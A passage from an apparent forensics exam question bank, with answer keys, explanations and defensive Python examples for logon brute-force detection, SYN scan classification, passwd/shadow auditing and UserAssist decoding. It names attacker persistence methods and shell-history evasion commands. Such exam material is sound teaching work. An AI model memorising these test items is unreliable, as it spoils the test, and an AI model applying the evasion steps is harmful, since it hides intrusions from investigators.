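On a live host the same text comes from 'reg export HKLM\SYSTEM\CurrentControlSet\Services services.reg' (and the equivalent for the Run keys); for an offline hive, load it with 'reg load' first or use a hive parser that can emit .reg text. The Bluetooth entry in the sample is deliberately left out of the findings: its Start value of 3 (manual) means it does not launch at boot, however odd its path.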

53
Multi-Selectmedium

Which TWO Windows artifacts can be used to identify recently accessed files or folders on a system? (Select the two best answers.)

Select 2 answers
A.Event ID 4624
B.SAM hive
C.Prefetch files
D.LNK files
E.ShellBags
AnswersD, E

Correct. LNK files point to recently opened files.

Why this answer

ShellBags record the folders a user browsed in Explorer (together with view settings), and LNK files are the shortcuts Windows creates when a file is opened, recording the target's path, volume serial number and MAC timestamps. Prefetch and Event ID 4624 record program execution and logons respectively, and the SAM hive stores account data; none of those three shows which files or folders were opened.

54
MCQmedium

A network forensic analyst captures packets and sees a TCP SYN packet sent to port 80, followed by a SYN-ACK, then an ACK, and then an HTTP GET request. What can be concluded?

A.The session was hijacked after the handshake
B.A TCP half-open scan was performed
C.The TCP connection was successfully established
D.The connection was refused by the server
AnswerC

The three-way handshake completed, followed by data transfer.

Why this answer

This is the standard three-way handshake (SYN, SYN-ACK, ACK) followed by data (HTTP GET), indicating a successful TCP connection establishment.

55
MCQhard

A forensic analyst is using Plaso (log2timeline) to create a super timeline from a compromised Windows system. Which of the following is the PRIMARY advantage of using Plaso over manual timeline creation?

A.It automatically correlates events from different sources and provides a unified timeline
B.It can detect malware by signature scanning
C.It generates a timeline only from Windows Event Logs
D.It encrypts the timeline for secure storage
AnswerA

Plaso extracts timestamps from many artifacts and creates a single timeline, enabling efficient analysis of event sequences.

Why this answer

Plaso automates the extraction and correlation of timestamps from multiple artifacts (registry, event logs, file system, etc.) into a unified timeline, saving time and reducing errors compared to manual extraction.

56
Multi-Selecteasy

Which TWO of the following are common Linux log files that can be used for forensic analysis?

Select 2 answers
A./etc/passwd
B./var/log/syslog
C./var/log/auth.log
D./etc/shadow
E./proc/cpuinfo
AnswersB, C

Captures system logs including kernel messages, services, etc.

Why this answer

/var/log/auth.log records authentication attempts, and /var/log/syslog records general system messages. Both are valuable in forensic investigations.

57
MCQmedium

A network forensics analyst captures traffic and sees a series of TCP SYN packets sent to multiple ports on a target, with no corresponding SYN-ACK replies. What type of activity is MOST likely indicated?

A.A denial-of-service (DoS) flood
B.A port scan reconnaissance
C.A man-in-the-middle attack
D.Normal web browsing traffic
AnswerB

SYN packets to multiple ports without replies indicate scanning for open ports.

Why this answer

A port scan sends a SYN to each probed port to learn which ones are open. An open port answers SYN-ACK, a closed port answers RST, and a filtered port answers nothing, so a burst of SYNs to many ports with few or no SYN-ACKs is the signature of a scan. A DoS flood targets one service with volume rather than walking many ports, a man-in-the-middle attack does not show up as unanswered SYNs, and normal browsing completes the three-way handshake.

58
MCQhard

A forensic tool outputs a timeline of file system events. The analyst needs to correlate registry modifications with file creation times. Which tool is specifically designed for super timeline creation from multiple sources?

A.Plaso
B.Autopsy
C.Volatility
D.Sleuth Kit
AnswerA

Plaso (log2timeline) creates super timelines by parsing multiple sources.

Why this answer

Plaso (log2timeline) is a timeline creation tool that aggregates data from various forensic artifacts into a super timeline.

59
MCQmedium

A network analyst is reviewing a packet capture and sees a large number of TCP SYN packets sent to various ports on a single host from multiple source IPs. This pattern is most indicative of which type of attack?

A.ARP spoofing
B.SYN flood
C.DNS amplification
D.Ping of death
AnswerB

SYN flood is a DoS attack with many SYN packets.

Why this answer

A SYN flood sends many SYNs without ever completing the handshake; the server allocates half-open connection state for each one until its backlog is exhausted. The source addresses are usually spoofed, which is why the traffic appears to come from many hosts. The distinction from a scan lies in volume and shape: a scan walks many ports from few sources and stops, a flood hammers one target from many sources and never sends the final ACK.

60
Multi-Selectmedium

Which THREE of the following are Windows Event IDs that are particularly useful for investigating account logon activities?

Select 3 answers
A.4625 - An account failed to log on
B.4648 - A logon was attempted using explicit credentials
C.4624 - An account was successfully logged on
D.4656 - A handle to an object was requested
E.7045 - A service was installed in the system
AnswersA, B, C

Records failed authentication attempts.

Why this answer

Event ID 4624 logs successful logons, 4625 failed logons, and 4648 logons attempted with explicit credentials (RunAs, or a process supplying another account's password, a common sight during lateral movement). All three live in the Security log; the Logon Type field (2 interactive, 3 network, 10 RemoteInteractive) and the IpAddress field tell you how and from where. 4656 belongs to object-access auditing, and 7045 (System log) records service installation, which matters for persistence rather than logon investigations.

61
Multi-Selectmedium

Which TWO of the following are valid artifacts for determining program execution on a Windows system? (Select TWO.)

Select 2 answers
A.Pagefile.sys
B.System Restore points
C.Jump Lists
D.Prefetch files
E.Windows Error Reporting logs
AnswersC, D

Jump Lists record recently accessed files per application, showing usage.

Why this answer

Prefetch files (C:\Windows\Prefetch\<EXE>-<hash>.pf) record an executable's name, its run count and last run times (the last eight on Windows 8 and later), and the files and directories it touched in its first seconds. Jump Lists (the AutomaticDestinations and CustomDestinations folders under %AppData%\Microsoft\Windows\Recent) record the files each application opened, which in turn proves the application ran. Pagefile.sys and Windows Error Reporting logs may contain execution traces incidentally, and System Restore points snapshot system state; none of them is an execution record by design.

62
MCQeasy

In Windows forensics, which artifact is used to track recently accessed files and folders via the 'Recent Items' feature?

A.Jump lists
B.ShellBags
C.Prefetch files
D.LNK files
AnswerD

LNK files track file access via shortcuts.

Why this answer

LNK files (shortcuts) are created automatically when a user opens a file or folder and are stored under %AppData%\Microsoft\Windows\Recent (Office documents also appear under %AppData%\Microsoft\Office\Recent). Each one records the target's path, size, MAC timestamps and volume serial number, and sometimes the host's MAC address and NetBIOS name, so it can prove that a file existed and was opened even after the file itself has been deleted.

63
MCQmedium

A Linux system administrator notices unusual outbound connections from a server. Which of the following commands would MOST effectively capture a list of all current network connections along with the associated process IDs?

A.sudo iptables -L
B.sudo lsmod
C.sudo ifconfig -a
D.sudo ss -tunap
AnswerD

ss -tunap lists all TCP/UDP sockets with numeric addresses, process info, and PID.

Why this answer

'ss -tunap' lists TCP (-t) and UDP (-u) sockets, including listeners (-a), with numeric addresses (-n) and the owning process name and PID (-p, which needs root to see other users' processes). 'netstat -tunap' gives the same view but comes from the deprecated net-tools package and is missing on many current distributions; 'lsof -i' reaches the same information through open file descriptors. 'iptables -L' shows firewall rules, 'lsmod' loaded kernel modules and 'ifconfig -a' interface addresses; none of them maps connections to processes. Because a userland rootkit can hook all of these tools, compare their output with a packet capture or with /proc/net/tcp when tampering is suspected.

64
Multi-Selecthard

Which THREE of the following are common persistence mechanisms found in Linux systems? (Select three.)

Select 3 answers
A..bashrc in user home directories
B.SSH authorized_keys
C.Systemd services (.service files)
D.Cron jobs (crontab)
E./etc/passwd file modification
AnswersB, C, D

Adding an attacker's public key to authorized_keys allows persistent SSH access.

Why this answer

Cron jobs, SSH authorized_keys and systemd units are the three most reliable Linux persistence mechanisms: they fire without any user logging in, and an added public key survives password changes. The exam treats the other two options as weaker: .bashrc runs only when that user opens an interactive shell (it is nonetheless a real technique, MITRE ATT&CK T1546.004, and worth checking), and editing /etc/passwd directly is account manipulation rather than an execution trigger. For systemd, review /etc/systemd/system and each user's ~/.config/systemd/user for units whose ExecStart points to an unusual path; for authorized_keys, check every home directory, /root, and any non-default AuthorizedKeysFile set in sshd_config.

65
MCQeasy

A security analyst reviews Windows Event Logs and sees Event ID 4625 multiple times for a single user account from a remote IP address within a short time frame. What is the MOST likely interpretation?

A.The user successfully logged on from multiple locations
B.An attacker is attempting to brute-force the user's password
C.The system is experiencing a denial-of-service attack
D.A service installed itself on the system
AnswerB

Multiple failed logon attempts from a single IP indicate a brute-force attack.

Why this answer

Event ID 4625 is a failed logon. Many 4625s for one account from the same remote IP in a short window is the classic brute-force pattern. Confirm it with the event's fields: Logon Type (3 for SMB and other network logons, 10 for RDP), Status and SubStatus (0xC000006A is a wrong password for a valid account, 0xC0000064 an unknown user name), and whether a 4624 from the same IP follows the burst, which would mean a guess succeeded. The reverse shape, one IP producing a single failure against many accounts, is a password spray.
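
The pattern in the question, plus the spray variant, as an added Python example that is not part of the page: a sliding-window count of 4625 events per (IpAddress, TargetUserName), a per-IP count of distinct accounts failing inside the window, and a check for a 4624 from an IP that has already been flagged. The events are constructed dicts standing in for the EventData fields of real Security-log records (as obtained with Get-WinEvent or by parsing an exported .evtx); the thresholds and window are assumptions.

```python
"""Added example: spot brute-force and password-spray patterns in Security-log
events (4625 failed / 4624 successful logon). Events are constructed dicts
standing in for the parsed EventData fields of real records."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, Tuple


def build_sample() -> List[Dict]:
    base = datetime(2024, 3, 1, 2, 0, 0)          # constructed timestamps
    ev: List[Dict] = []
    # 12 failures for one account from one remote IP, 5 s apart, then a success.
    for i in range(12):
        ev.append({"EventID": 4625, "TimeCreated": base + timedelta(seconds=5 * i),
                   "TargetUserName": "alice", "IpAddress": "203.0.113.7", "LogonType": 3})
    ev.append({"EventID": 4624, "TimeCreated": base + timedelta(seconds=65),
               "TargetUserName": "alice", "IpAddress": "203.0.113.7", "LogonType": 3})
    # One IP trying 15 different accounts once each: a password spray.
    for i in range(15):
        ev.append({"EventID": 4625, "TimeCreated": base + timedelta(minutes=10, seconds=20 * i),
                   "TargetUserName": f"user{i:02d}", "IpAddress": "198.51.100.4", "LogonType": 3})
    # A single local typo that should not be flagged.
    ev.append({"EventID": 4625, "TimeCreated": base + timedelta(hours=3),
               "TargetUserName": "bob", "IpAddress": "127.0.0.1", "LogonType": 2})
    return ev


def detect(events: List[Dict], window: timedelta = timedelta(minutes=5),
           brute_threshold: int = 10, spray_threshold: int = 10) -> List[Tuple]:
    """Return (kind, ip, detail, time) findings in chronological order."""
    findings: List[Tuple] = []
    per_pair: Dict[Tuple[str, str], deque] = defaultdict(deque)      # (ip, user) -> failure times
    per_ip_users: Dict[str, Dict[str, datetime]] = defaultdict(dict)  # ip -> {user: last failure}
    flagged_brute, flagged_spray = set(), set()
    for e in sorted(events, key=lambda ev: ev["TimeCreated"]):
        ip, user, t = e["IpAddress"], e["TargetUserName"], e["TimeCreated"]
        if e["EventID"] == 4625:
            q = per_pair[(ip, user)]
            q.append(t)
            while t - q[0] > window:               # drop failures outside the sliding window
                q.popleft()
            if len(q) >= brute_threshold and (ip, user) not in flagged_brute:
                flagged_brute.add((ip, user))
                findings.append(("brute-force", ip, user, t))
            users = per_ip_users[ip]
            users[user] = t
            recent = sum(1 for last in users.values() if t - last <= window)
            if recent >= spray_threshold and ip not in flagged_spray:
                flagged_spray.add(ip)
                findings.append(("password-spray", ip, f"{recent} accounts", t))
        elif e["EventID"] == 4624 and (ip, user) in flagged_brute:
            # A success right after a burst of failures is the event that matters most.
            findings.append(("success-after-failures", ip, user, t))
    return findings


if __name__ == "__main__":
    for kind, ip, detail, t in detect(build_sample()):
        print(f"{t:%Y-%m-%d %H:%M:%S}  {kind:24} {ip:15} {detail}")
```

Real 4625 records carry the source address in the IpAddress element of EventData ('-' or '127.0.0.1' for local logons), so local typos naturally drop out of the per-IP counts; add Status/SubStatus to the key if you want to separate wrong-password guesses from probes for non-existent accounts.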

66
MCQeasy

Which Linux log file is the primary source for authentication-related events, including SSH login attempts and sudo usage?

A./var/log/kern.log
B./var/log/syslog
C./var/log/auth.log
D./var/log/messages
AnswerC

Correct: auth.log is dedicated to authentication logs.

Why this answer

On Debian-based distributions authentication events are logged to /var/log/auth.log; RHEL-based systems use /var/log/secure. On systems that rely on the systemd journal without a syslog daemon, the same events are retrieved with 'journalctl _COMM=sshd' or 'journalctl -u sshd'. kern.log holds kernel messages, and syslog and messages hold general system messages.

67
MCQmedium

A network analyst captures suspicious traffic and uses Wireshark to examine packets. The analyst notices many TCP SYN packets sent to various ports on a single host with no SYN-ACK replies. What type of activity is MOST likely observed?

A.Denial of Service (DoS) attack
B.Port scan
C.DNS amplification
D.ARP poisoning
AnswerB

SYN packets to multiple ports are characteristic of a TCP SYN scan.

Why this answer

A SYN scan sends one SYN per port to find open ones. Open ports answer SYN-ACK (a half-open scanner then replies RST instead of completing the handshake), closed ports answer RST, and filtered ports answer nothing. Many SYNs to many ports on one host with few or no SYN-ACKs therefore indicates scanning. A DoS flood, DNS amplification and ARP poisoning produce different shapes: volume against one service, large UDP responses, and unsolicited ARP replies respectively. In Wireshark, the filter 'tcp.flags.syn==1 && tcp.flags.ack==0' isolates the probes and Statistics > Conversations shows how many ports each source touched.
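
Questions 57, 59 and 67 all turn on reading SYN behaviour. As an added Python example (not from the page), the classifier below separates a scan (one source, many ports, handshakes not completed) from a flood (many sources, one target, no final ACKs) and from a normal session. It keys on whether the client ever sends the third-step ACK rather than on the presence of SYN-ACKs, because a closed port's RST and a filtered port's silence both look like "no SYN-ACK". The packets are constructed tuples rather than a real capture; the thresholds are assumptions.

```python
"""Added example: tell a SYN port scan from a SYN flood and from ordinary
sessions in captured TCP traffic. Packets are constructed tuples, not a real
pcap; flag letters follow tcpdump (S, SA, A, R, RA)."""
from collections import defaultdict
from typing import Dict, List, Tuple

Packet = Tuple[str, str, int, int, str]   # (src, dst, sport, dport, flags)


def build_sample() -> List[Packet]:
    pkts: List[Packet] = []
    # 1. Benign session: full three-way handshake to 10.0.0.20:443.
    pkts += [("10.0.0.9", "10.0.0.20", 51000, 443, "S"),
             ("10.0.0.20", "10.0.0.9", 443, 51000, "SA"),
             ("10.0.0.9", "10.0.0.20", 51000, 443, "A")]
    # 2. Half-open scan: 10.0.0.5 probes ports 1-25; 22 and 80 answer SYN-ACK and
    #    the scanner tears them down with RST; closed ports answer RST/ACK.
    for p in range(1, 26):
        pkts.append(("10.0.0.5", "10.0.0.20", 40000 + p, p, "S"))
        if p in (22, 80):
            pkts.append(("10.0.0.20", "10.0.0.5", p, 40000 + p, "SA"))
            pkts.append(("10.0.0.5", "10.0.0.20", 40000 + p, p, "R"))
        else:
            pkts.append(("10.0.0.20", "10.0.0.5", p, 40000 + p, "RA"))
    # 3. SYN flood: 20 (spoofed) sources, 3 SYNs each, to 10.0.0.30:80; the server
    #    answers SYN-ACK every time but the final ACK never arrives.
    for i in range(20):
        src = f"198.51.100.{i + 1}"
        for n in range(3):
            pkts.append((src, "10.0.0.30", 1024 + n, 80, "S"))
            pkts.append(("10.0.0.30", src, 80, 1024 + n, "SA"))
    return pkts


def classify(packets: List[Packet], scan_ports: int = 10,
             flood_syns: int = 50, flood_sources: int = 5) -> Dict[Tuple[str, str], str]:
    """Return {(src, dst): 'port scan'} and {('*', dst): 'SYN flood'} verdicts."""
    syns: Dict[Tuple[str, str], Dict[int, int]] = defaultdict(lambda: defaultdict(int))
    final_acks: Dict[Tuple[str, str], set] = defaultdict(set)   # client->server ports ACKed
    for src, dst, sport, dport, flags in packets:
        if flags == "S":                  # initial SYN, client -> server
            syns[(src, dst)][dport] += 1
        elif flags == "A":                # third step of the handshake (or a later data ACK)
            final_acks[(src, dst)].add(dport)
    verdicts: Dict[Tuple[str, str], str] = {}
    per_target = defaultdict(lambda: {"syns": 0, "sources": set(), "completed": 0})
    for (src, dst), ports in syns.items():
        completed = len(set(ports) & final_acks[(src, dst)])
        t = per_target[dst]
        t["syns"] += sum(ports.values())
        t["sources"].add(src)
        t["completed"] += completed
        # Scan: one source touches many ports and almost none reach a completed handshake.
        if len(ports) >= scan_ports and completed < 0.2 * len(ports):
            verdicts[(src, dst)] = "port scan"
    for dst, t in per_target.items():
        # Flood: many SYNs from many sources to one host, none of them ever ACKed.
        if t["syns"] >= flood_syns and len(t["sources"]) >= flood_sources and t["completed"] == 0:
            verdicts[("*", dst)] = "SYN flood"
    return verdicts


if __name__ == "__main__":
    for key, verdict in classify(build_sample()).items():
        print(f"{key[0]:>15} -> {key[1]:<12} {verdict}")
```

To run this over a real capture, produce the same five-tuples with 'tshark -r capture.pcap -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport -e tcp.flags.str' and map the flag string to the letters used here; the 0.2 completion ratio also catches full-connect scans, which do complete handshakes on the few open ports.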

68
MCQmedium

A forensic analyst is examining a compromised Linux server and finds a suspicious binary running as a service. Which file should be checked to determine if the binary is set to start at boot?

A./etc/crontab
B./etc/shadow
C./var/log/auth.log
D./etc/passwd
AnswerA

Crontab files can be used to run tasks at boot (e.g., @reboot).

Why this answer

Of the options listed, only /etc/crontab can launch anything: an '@reboot' entry there runs a command once at every boot, and a '*/N' entry keeps it alive between boots. /etc/shadow and /etc/passwd hold account data, and /var/log/auth.log holds authentication events. If the binary really runs as a service, the authoritative places are the systemd unit files (/etc/systemd/system, /lib/systemd/system, and the output of 'systemctl list-unit-files --state=enabled') or the SysV scripts under /etc/init.d and /etc/rc*.d, which the question does not offer; check them alongside /etc/crontab and /etc/cron.d.

69
MCQmedium

During a forensic analysis of a compromised Linux server, you notice that the file /var/log/auth.log has been cleared. However, you find that the attacker's commands are still partially recoverable. Which artifact most likely contains the attacker's command history?

A./var/log/syslog
B.~/.bash_history
C./proc/1/cmdline
D./etc/shadow
AnswerB

This file logs commands entered in bash.

Why this answer

Each user's shell history (~/.bash_history for bash, including /root/.bash_history) records interactive commands, so collect it for every account even when auth.log has been wiped. Two caveats: bash writes the file only when the shell exits, so an active or killed session leaves nothing on disk (a live system may still hold it in the shell process's memory), and attackers routinely run 'unset HISTFILE', set HISTSIZE=0, or symlink the file to /dev/null, so a missing or empty history is itself an indicator. /proc/1/cmdline is only the init process's command line, syslog does not record shell commands, and /etc/shadow holds password hashes.

70
MCQeasy

In Linux, which file contains hashed user passwords?

A./etc/gshadow
B./etc/group
C./etc/passwd
D./etc/shadow
AnswerD

Correct. /etc/shadow holds the password hashes.

Why this answer

The /etc/shadow file stores hashed user passwords along with password aging information, and is readable only by root to enhance security. In contrast, /etc/passwd contains user account information but stores only a placeholder (usually 'x' or '*') for the password hash, not the hash itself. This separation is a standard Linux security mechanism to prevent unauthorized access to password hashes.

Exam trap

EC-Council often tests the misconception that /etc/passwd still contains password hashes, leading candidates to choose option C, but modern Linux systems have moved hashes to /etc/shadow for security.

How to eliminate wrong answers

Option A is wrong because /etc/gshadow stores hashed group passwords and group administrator information, not user passwords. Option B is wrong because /etc/group defines group memberships and optionally group passwords (often stored as 'x' with hashes in /etc/gshadow), not user password hashes. Option C is wrong because /etc/passwd historically stored password hashes, but modern Linux systems use shadow passwords, and /etc/passwd now contains only a placeholder (e.g., 'x') indicating the hash is in /etc/shadow.
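
The passwd/shadow separation described above is something an investigator should verify rather than assume. The added Python example below (not from the page) cross-checks constructed copies of both files for the conditions that matter in practice: a second UID 0 account, a hash placed directly in /etc/passwd (which is used in preference to the shadow entry and is world-readable), an empty hash, legacy MD5-crypt or DES hashes, and accounts present in one file but not the other. The sample lines and hash strings are constructed placeholders, not real hashes.

```python
"""Added example: cross-check /etc/passwd against /etc/shadow for the conditions
an investigator looks for. Both files below are constructed samples."""
from typing import Dict, List, Tuple

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/bash
sysadm:x:0:0::/var/tmp:/bin/bash
backup:$6$abc$0123456789abcdef:1002:1002::/home/backup:/bin/sh
"""
SAMPLE_SHADOW = """root:$6$saltsalt$hashhashhash:19783:0:99999:7:::
daemon:*:19783:0:99999:7:::
alice:$y$j9T$saltsalt$hashhashhash:19783:0:99999:7:::
bob:$1$abc$md5hashmd5hash:19783:0:99999:7:::
sysadm::19800:0:99999:7:::
"""
DESCRIPTIONS = {
    "uid0": "second UID 0 account (root-equivalent backdoor)",
    "hash_in_passwd": "hash stored in world-readable /etc/passwd; shadow entry is bypassed",
    "empty_passwd_field": "empty password field in /etc/passwd (no password required)",
    "empty_shadow_hash": "empty hash in /etc/shadow (login without a password may be allowed)",
    "weak_hash": "MD5-crypt or DES hash: cheap to crack offline",
    "no_shadow_entry": "account has no /etc/shadow line",
    "orphan_shadow": "shadow entry with no matching /etc/passwd account",
    "malformed": "unexpected field count",
}


def audit(passwd_text: str, shadow_text: str) -> List[Tuple[str, str]]:
    """Return (account, code) pairs; DESCRIPTIONS explains each code."""
    findings: List[Tuple[str, str]] = []
    passwd: Dict[str, List[str]] = {}
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            findings.append((f[0], "malformed"))
            continue
        name, pw, uid = f[0], f[1], f[2]
        passwd[name] = f
        if uid == "0" and name != "root":
            findings.append((name, "uid0"))
        if pw == "":
            findings.append((name, "empty_passwd_field"))
        elif pw not in ("x", "*", "!"):            # anything else is a usable hash
            findings.append((name, "hash_in_passwd"))
    shadow_names = set()
    for line in shadow_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 9:
            findings.append((f[0], "malformed"))
            continue
        name, h = f[0], f[1]
        shadow_names.add(name)
        if name not in passwd:
            findings.append((name, "orphan_shadow"))
        if h == "":
            findings.append((name, "empty_shadow_hash"))
        elif h.startswith(("*", "!")):             # locked account, nothing to crack
            continue
        elif h.startswith("$1$") or not h.startswith("$"):
            findings.append((name, "weak_hash"))    # $1$ is MD5-crypt; no '$' prefix is DES
    for name in passwd:
        if name not in shadow_names:
            findings.append((name, "no_shadow_entry"))
    return findings


if __name__ == "__main__":
    for account, code in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{account:8} {code:20} {DESCRIPTIONS[code]}")
```

Run it against copies pulled from the evidence image rather than the live host, and treat a 'hash_in_passwd' hit as urgent: that hash is readable by every local user and is what the system actually checks at login.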

71
MCQmedium

During a Windows forensic investigation, an analyst finds a registry key under NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count. What type of artifact is this, and what information does it typically contain?

A.UserAssist entries that record program execution history with counts and timestamps
B.Jump list data from the taskbar showing recently opened files
C.Prefetch file metadata indicating application launch times
D.ShellBags data displaying folder view settings and sizes
AnswerA

UserAssist is designed to log program launches by the user, including the number of times run and last execution.

Why this answer

UserAssist keys track programs launched through Windows Explorer (the Start menu, desktop shortcuts, double-clicks). Under each {GUID}\Count subkey the value names are ROT13-encoded program paths, often with a known-folder GUID standing in for C:\Windows or C:\Program Files, and the binary value holds the run count, total focus time and the last-execution FILETIME. Decoding the names and timestamps reconstructs what the user ran and when; launches from a command prompt do not appear here, so combine UserAssist with Prefetch.

72
MCQhard

A network forensic analyst examines a pcap file in Wireshark and sees an HTTP POST request to '/shell.jsp' with a parameter 'cmd' containing 'dir'. The response contains a directory listing. Which intrusion artifact is indicated?

A.SQL injection
B.Directory traversal
C.Webshell
D.Cross-site scripting (XSS)
AnswerC

A webshell allows remote command execution via web requests, evidenced by cmd parameter and directory listing.

Why this answer

A webshell is a malicious script that provides remote command execution via web requests. The POST to a JSP file with a cmd parameter and directory listing in the response indicates a webshell.

73
MCQhard

A forensic analyst is examining a Windows system and finds that the UserAssist key in the NTUSER.DAT hive contains entries with Rot13-encoded names. What is the primary purpose of the UserAssist key?

A.Record USB device connection history
B.Store user password history
C.Log program execution counts and last run times
D.Track recently opened documents via Jump Lists
AnswerC

UserAssist tracks how often and when programs were run.

Why this answer

UserAssist tracks application execution count and last run time per user. The ROT13 encoding is a trivial obfuscation that keeps the names from being read casually or matched by simple string searches; it is not a security measure and is reversed with any ROT13 tool. USB connection history lives in SYSTEM\CurrentControlSet\Enum\USBSTOR, password history is not kept in NTUSER.DAT, and recently opened documents via Jump Lists are a separate artifact.
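
Questions 71 and 73 describe the UserAssist Count values; the added Python example below (not from the page) decodes one: ROT13 on the value name, expansion of the known-folder GUID prefix, and struct unpacking of the 72-byte Windows 7+ value for run count, focus time and the last-run FILETIME. The sample entry is packed by build_sample() with the same layout rather than read from a hive; the three GUIDs in KNOWN_FOLDERS are the standard KNOWNFOLDERID values for System32, Windows and Program Files.

```python
"""Added example: decode a UserAssist Count value (Windows 7 and later layout).
The sample value is constructed with the same packing, not taken from a hive."""
import codecs
import struct
from datetime import datetime, timedelta, timezone
from typing import Dict, Tuple

# Count subkey for executables: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\
#   Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
#   (shortcut launches are under {F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}).
# Value names are ROT13 and often start with a known-folder GUID instead of a drive path.
KNOWN_FOLDERS = {
    "{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}": r"C:\Windows\System32",
    "{F38BF404-1D43-42F2-9305-67DE0B28FC23}": r"C:\Windows",
    "{6D809377-6AF0-444B-8957-A3773F02200E}": r"C:\Program Files",
}
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    return ((dt - EPOCH_1601) // timedelta(microseconds=1)) * 10


def expand_known_folder(name: str) -> str:
    for guid, path in KNOWN_FOLDERS.items():
        if name.upper().startswith(guid):
            return path + name[len(guid):]
    return name


def decode_userassist(value_name: str, data: bytes) -> Dict:
    """Decode one Count entry: ROT13 name plus the 72-byte binary value.
    Layout (Win7+): 0 session id, 4 run count, 8 focus count, 12 focus time (ms),
    16..59 not used here, 60 last-run FILETIME, 68 padding."""
    if len(data) != 72:
        raise ValueError(f"expected 72-byte value, got {len(data)}")
    name = codecs.decode(value_name, "rot13")
    _session, run_count, focus_count, focus_ms = struct.unpack_from("<4I", data, 0)
    (last_run_ft,) = struct.unpack_from("<Q", data, 60)
    return {
        "name": name,
        "path": expand_known_folder(name),
        "run_count": run_count,
        "focus_count": focus_count,
        "focus_time": timedelta(milliseconds=focus_ms),
        "last_run": filetime_to_datetime(last_run_ft) if last_run_ft else None,
    }


def build_sample() -> Tuple[str, bytes]:
    """Constructed entry: cmd.exe run 7 times, last on 2024-03-01 14:30 UTC."""
    last_run = datetime(2024, 3, 1, 14, 30, tzinfo=timezone.utc)
    data = (struct.pack("<4I", 0, 7, 3, 42000) + b"\x00" * 44
            + struct.pack("<Q", datetime_to_filetime(last_run)) + b"\x00" * 4)
    raw_name = codecs.encode(r"{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\cmd.exe", "rot13")
    return raw_name, data


if __name__ == "__main__":
    name, data = build_sample()
    print(name)                        # as stored in the hive: ROT13-encoded
    print(decode_userassist(name, data))
```

Feed it real values from an exported NTUSER.DAT through any hive parser that yields (value name, raw bytes). Windows XP values are 16 bytes with a different layout (session, count, FILETIME) and are rejected by the length check; the run count there starts at 5, a quirk that does not apply to the Windows 7+ format decoded here.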

74
MCQeasy

Which tool is specifically designed for timeline analysis of forensic artifacts across multiple systems and can process output from various forensic tools?

A.Autopsy
B.Wireshark
C.Sleuth Kit
D.log2timeline
AnswerD

log2timeline (Plaso) is used for timeline generation and analysis in digital forensics.

Why this answer

log2timeline (Plaso) is a tool for creating super timelines from multiple log and artifact sources, enabling analysis of events across time.

75
Multi-Selectmedium

An investigator is analyzing a Windows system and wants to find evidence of USB device usage. Which TWO registry keys should be examined? (Select TWO.)

Select 2 answers
A.HKLM\SAM\SAM
B.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
C.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
D.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
E.HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
AnswersC, D

Lists all USB storage devices ever connected.

Why this answer

USBSTOR (HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR) lists every USB mass-storage device the system has enumerated, keyed by vendor, product and revision, with the device serial number as the subkey name. MountPoints2, in the user's NTUSER.DAT, records which of those volumes that particular user mounted, so the pair ties a device to an account. SAM holds account hashes, the Run key holds autostart entries and ProfileList maps SIDs to profile paths. For first-connection times, add HKLM\SOFTWARE\Microsoft\Windows Portable Devices\Devices and C:\Windows\INF\setupapi.dev.log.
